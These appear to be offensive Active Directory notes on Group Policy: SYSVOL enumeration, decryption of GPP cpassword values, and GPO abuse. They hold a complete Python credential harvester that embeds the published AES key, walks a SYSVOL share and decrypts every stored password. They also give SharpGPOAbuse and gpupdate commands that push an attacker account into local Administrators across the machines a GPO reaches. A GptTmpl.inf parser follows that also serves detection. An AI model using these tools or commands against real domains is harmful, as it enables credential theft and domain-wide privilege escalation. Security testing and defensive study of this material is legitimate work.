
Group Policies (GPO)

It is always a good idea to check the SYSVOL domain share (it exists on every domain controller by default). The share maps to %SystemRoot%\SYSVOL\sysvol\<domain_name> on the domain controller and every authenticated domain user can read it.

There might be interesting domain policies or old backup policies readable under \\<machine>\sysvol\<domain>\Policies\. Old policies are common artifacts on the share because administrators often leave them behind when they roll out new ones, and they can tell you a lot about how the current policies are built.

GPP Password

The XML files of old policies might include encrypted passwords. Historically, system administrators often set local workstation passwords through Group Policy Preferences (GPP), which stores them in a cpassword attribute in files such as Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Printers.xml and Drives.xml under the GPO's Preferences folder. The value is encrypted with AES-256, but AES is symmetric and Microsoft published the key in the MS-GPPREF specification on MSDN, so anyone who can read the file can decrypt it. MS14-025 (2014) removed the ability to store new passwords this way but did not clean up existing files, so these artifacts are still common.

An interesting line within an XML file might look like this: cpassword="+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

Kali:

# Decrypt GPP password
gpp-decrypt $encrypted_password
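As an added example (not part of the original notes and not the gpp-decrypt tool itself), the Python below does what gpp-decrypt does and additionally walks a copied or mounted SYSVOL tree for every GPP file type: it restores the base64 padding that GPP strips, decrypts with the MS-GPPREF key (AES-256-CBC, zero IV), removes the PKCS#7 padding and decodes the UTF-16LE password. The SYSVOL fragment, GPO GUID, account name and password built in demo() are constructed for this example; the code needs the cryptography package (it falls back to PyCryptodome if that is missing).

```python
import base64
import os
import tempfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(key: bytes, iv: bytes, data: bytes, decrypt: bool) -> bytes:
        cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
        op = cipher.decryptor() if decrypt else cipher.encryptor()
        return op.update(data) + op.finalize()
except ImportError:  # fall back to PyCryptodome when 'cryptography' is absent
    from Crypto.Cipher import AES

    def _aes_cbc(key: bytes, iv: bytes, data: bytes, decrypt: bool) -> bytes:
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return cipher.decrypt(data) if decrypt else cipher.encrypt(data)

# AES-256 key Microsoft published in MS-GPPREF (section 2.2.1.1.4); every GPP
# cpassword in every domain is encrypted with it, CBC mode, all-zero IV.
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)

# GPP XML files that can carry a cpassword attribute, mapped to the attribute
# that names the account in that file type
GPP_FILES = {
    "Groups.xml": "userName", "Services.xml": "accountName",
    "ScheduledTasks.xml": "runAs", "DataSources.xml": "username",
    "Printers.xml": "username", "Drives.xml": "userName",
}


def decrypt_cpassword(cpassword: str) -> str:
    """Turn a cpassword attribute value into the clear-text password."""
    # GPP strips the trailing '=' base64 padding; restore it before decoding
    padded = cpassword + "=" * (-len(cpassword) % 4)
    raw = _aes_cbc(GPP_KEY, GPP_IV, base64.b64decode(padded), decrypt=True)
    raw = raw[: -raw[-1]]            # strip PKCS#7 padding
    return raw.decode("utf-16-le")   # the password is stored as UTF-16LE


def encrypt_cpassword(password: str) -> str:
    """Inverse of decrypt_cpassword; only used here to build sample data."""
    data = password.encode("utf-16-le")
    pad = 16 - len(data) % 16
    data += bytes([pad]) * pad
    enc = _aes_cbc(GPP_KEY, GPP_IV, data, decrypt=False)
    return base64.b64encode(enc).decode().rstrip("=")


def find_gpp_passwords(sysvol_root: str) -> List[Dict[str, Optional[str]]]:
    """Walk a SYSVOL tree, parse every GPP XML file and decrypt each cpassword."""
    hits = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue                     # truncated or corrupt file, skip it
            for props in root.iter("Properties"):
                cpw = props.get("cpassword")
                if not cpw:
                    continue                 # entry without a stored password
                hits.append({
                    "file": path,
                    "user": props.get(GPP_FILES[name]),
                    "password": decrypt_cpassword(cpw),
                })
    return hits


def demo() -> List[Dict[str, Optional[str]]]:
    """Build a constructed SYSVOL fragment (not a real capture) and scan it."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    gpo = os.path.join(root, "Policies", "{11111111-2222-3333-4444-555555555555}")
    groups_dir = os.path.join(gpo, "Machine", "Preferences", "Groups")
    os.makedirs(groups_dir)
    cpw = encrypt_cpassword("Summer2014!")   # constructed sample password
    groups_xml = (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<Groups>\n'
        f'  <User name="localadmin"><Properties action="U" userName="localadmin" '
        f'cpassword="{cpw}"/></User>\n'
        '  <User name="nopass"><Properties action="U" userName="nopass"/></User>\n'
        '</Groups>\n'
    )
    with open(os.path.join(groups_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(groups_xml)
    return find_gpp_passwords(root)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['file']}: {hit['user']} / {hit['password']}")
```

Point find_gpp_passwords() at a SYSVOL copy (e.g. the mount point of \\<dc>\SYSVOL) to get every stored credential with the file it came from; entries without cpassword are ignored rather than reported as empty passwords.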

GPO Abuse

In a situation where an ordinary domain user has broad permissions (e.g. GenericWrite, WriteDacl or WriteOwner) on a GPO that is linked to an OU containing valuable objects (for example domain controllers, or servers where Domain Admins log on), we are able to abuse that GPO using SharpGPOAbuse.exe. Note that --AddLocalAdmin is a computer setting, so the GPO has to apply to the computers you want access to, not to the user or group you are targeting.

NOTE: This type of misconfiguration shows up in BloodHound as a GenericWrite/WriteDacl/WriteOwner edge ending in a GPO node and can be found with PowerView (Get-DomainObjectAcl against GPO objects).

Windows (example usage):

# Abuse GPO (Add User to local Administrators on every computer the GPO applies to)
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount $user --GPOName $gpo

# Update policies (run on the target computer; otherwise wait for the regular refresh, 90 minutes by default)
gpupdate /force

# The new group membership only lands in new logon tokens, so it might be necessary to log out and log on once again
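An added example, not part of the original notes or of SharpGPOAbuse: --AddLocalAdmin works by writing a Restricted Groups entry into the GPO's Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf on SYSVOL (and bumping the GPO version so clients re-apply it). The Python below parses that file and lists the SIDs a GPO forces into BUILTIN\Administrators, which is how you verify what the tool wrote before the targets refresh, and what a defender diffs across the Policies share. The GPO folder, attacker SID and template text built in demo() are constructed for this example.

```python
import configparser
import os
import tempfile
from typing import Dict, List

BUILTIN_ADMINS = "S-1-5-32-544"   # well-known SID of the local Administrators group

# Path of the security template inside a GPO folder on SYSVOL
GPT_TMPL = os.path.join("Machine", "Microsoft", "Windows NT", "SecEdit", "GptTmpl.inf")


def load_gpt_tmpl(path: str) -> configparser.ConfigParser:
    """Parse GptTmpl.inf. Windows writes it as UTF-16LE with a BOM; copies
    produced by tools or by hand may be plain ASCII, so accept both."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = data.decode("utf-16")
    else:
        text = data.decode("ascii")
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None,
                                   allow_no_value=True)
    cp.optionxform = str            # keys are SIDs; keep their case
    cp.read_string(text)
    return cp


def restricted_group_members(path: str) -> Dict[str, List[str]]:
    """Return {group_sid: [member_sids]} from the [Group Membership] section,
    i.e. the accounts the GPO forces into each local group."""
    cp = load_gpt_tmpl(path)
    result: Dict[str, List[str]] = {}
    if not cp.has_section("Group Membership"):
        return result
    for key, value in cp.items("Group Membership"):
        # keys are '*<group-sid>__Members' and '*<group-sid>__Memberof'
        sid, _, kind = key.lstrip("*").partition("__")
        if kind.lower() != "members":
            continue
        result[sid] = [m.strip().lstrip("*") for m in (value or "").split(",")
                       if m.strip()]
    return result


def local_admin_additions(gpo_dir: str) -> List[str]:
    """SIDs this GPO adds to BUILTIN\\Administrators on every computer it
    applies to; an empty list means the template does not touch the group."""
    path = os.path.join(gpo_dir, GPT_TMPL)
    if not os.path.exists(path):
        return []
    return restricted_group_members(path).get(BUILTIN_ADMINS, [])


def demo() -> List[str]:
    """Write a constructed GptTmpl.inf shaped like the one --AddLocalAdmin
    leaves behind (UTF-16LE with BOM, as Windows writes it) and inspect it."""
    gpo_dir = tempfile.mkdtemp(prefix="gpo_")
    os.makedirs(os.path.dirname(os.path.join(gpo_dir, GPT_TMPL)))
    attacker_sid = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # constructed
    template = (
        "[Unicode]\r\nUnicode=yes\r\n"
        "[Version]\r\nsignature=\"$CHICAGO$\"\r\nRevision=1\r\n"
        "[Group Membership]\r\n"
        f"*{BUILTIN_ADMINS}__Memberof =\r\n"
        f"*{BUILTIN_ADMINS}__Members = *{attacker_sid}\r\n"
    )
    with open(os.path.join(gpo_dir, GPT_TMPL), "wb") as fh:
        fh.write(template.encode("utf-16"))   # encode() prepends the BOM
    return local_admin_additions(gpo_dir)


if __name__ == "__main__":
    print("Added to local Administrators:", demo())
```

Run local_admin_additions() against each {GUID} folder under \\<dc>\SYSVOL\<domain>\Policies to see which policies push accounts into the local Administrators group; a new SID appearing in a GPO you did not expect to carry Restricted Groups is exactly the trace this abuse leaves.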
